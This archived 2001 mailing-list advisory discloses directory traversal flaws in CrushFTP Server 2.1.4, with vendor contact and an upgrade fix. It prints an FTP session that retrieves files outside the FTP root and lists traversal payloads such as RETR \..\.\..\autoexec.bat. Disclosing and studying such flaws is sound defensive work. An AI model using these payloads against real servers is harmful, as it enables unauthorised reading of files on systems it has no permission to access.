----- Begin Hush Signed Message from joetestaat_private ----- Vulnerabilities in CrushFTP Server Overview CrushFTP Server 2.1.4 is a java ftp server available from http://www.crushftp.com. Multiple vulnerabilities exist which allow users to change directories outside of the ftp root and download files. Details The following is an illustration of the problem. An ftp root of "c:\directory\directory" was used. >ftp localhost Connected to xxxxxxxxxx.rh.rit.edu. 220-Welcome to CrushFTP! 220 CrushFTP Server Ready. User (xxxxxxxxxx.rh.rit.edu:(none)): jdog 331 Username OK. Need password. Password: 230-Welcome! 230 Password OK. Connected. ftp> get ../../autoexec.bat 200 PORT command successful. 127.0.0.1:1868 150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes). 226-Download File Size:419 bytes @ 0K/sec. 226 Transfer complete. ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec. ftp> cd ... 250 "/.../" CWD command successful. ftp> get command.com 200 PORT command successful. 127.0.0.1:1870 150 Opening ASCII mode data connection for command.com (93890 bytes). 226-Download File Size:93890 bytes @ 92K/sec. 226 Transfer complete. ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec. The vendor issued two versions since I made initial contact to address additional variations. The following is a list of vulnerabilities which affected these intermediate versions (v2.1.5, v2.1.6): NLST .. NLST ... SIZE /../../ SIZE /.../ NLST \..\ NLST /../ NLST \...\ RETR \..\.\..\autoexec.bat RETR ./\...\autoexec.bat RETR .\.\..\..\autoexec.bat Solution Upgrade to v2.1.7 at: http://www.crushftp.com Vendor Status The program author, Ben Spink, was contacted via <spinkbat_private> on Friday, April 20, 2001. I would like to thank him for taking this matter seriously and showing extra effort to resolve these problems. - Joe Testa e-mail: joetestaat_private web page: http://hogs.rit.edu/~joet AIM: LordSpankatron ----- Begin Hush Signature v1.3 ----- H4DN+gBMDsfVP0qnC4F8dEdXR7FSneNzs2Now6Thibu+zett3cgrNijdAG77GWmeUrvE /eoSsg0s6IjBVwrVZXt0CN2XVslnxRwCxpPWAwfVgrQGSGigcRInv/WxWhxA0xEhiffv Wc3ZnhtPy0toe7N4XKyma58FwlqVRsXKqc5bJgBQquX0wlsnrLkpK3nSVhBBj/NkEkpG yoyaLAXBNVtfZz+AEdR6iuMZYVdIpsHToi4x5hT6cZNZtjD+MWT8vFT3SsAi0NQ6PqpI 0p6HB8uNJ3ra/oExJleegIDWkJMN/AoIhjuxlrCJxt2yu0CHVeUt+7c353Nv38C8QQvm bkkLdHMxMj6VvY99mnhyuBcXuJrGigPIguZAp6GER1uARXrv4w0RJ0QIeuB5JI4LXwBb sIFfCcy/boBIg3QNOPP/eoxGTQ7XCpPBcfXUHrPtk/Xd06XJ/9XhBC+fLzGgHMEE37hH wbPXMDaJ6OvogRLDVunx+UVJiqjybft960vFm2lgXd75 ----- End Hush Signature v1.3 ----- This message has been signed with a Hush Digital Signature. To verify the signature, please go to www.hush.com/tools Free, encrypted, secure Web-based email at www.hushmail.com
This archive was generated by hypermail 2b30 : Thu May 03 2001 - 21:37:08 PDT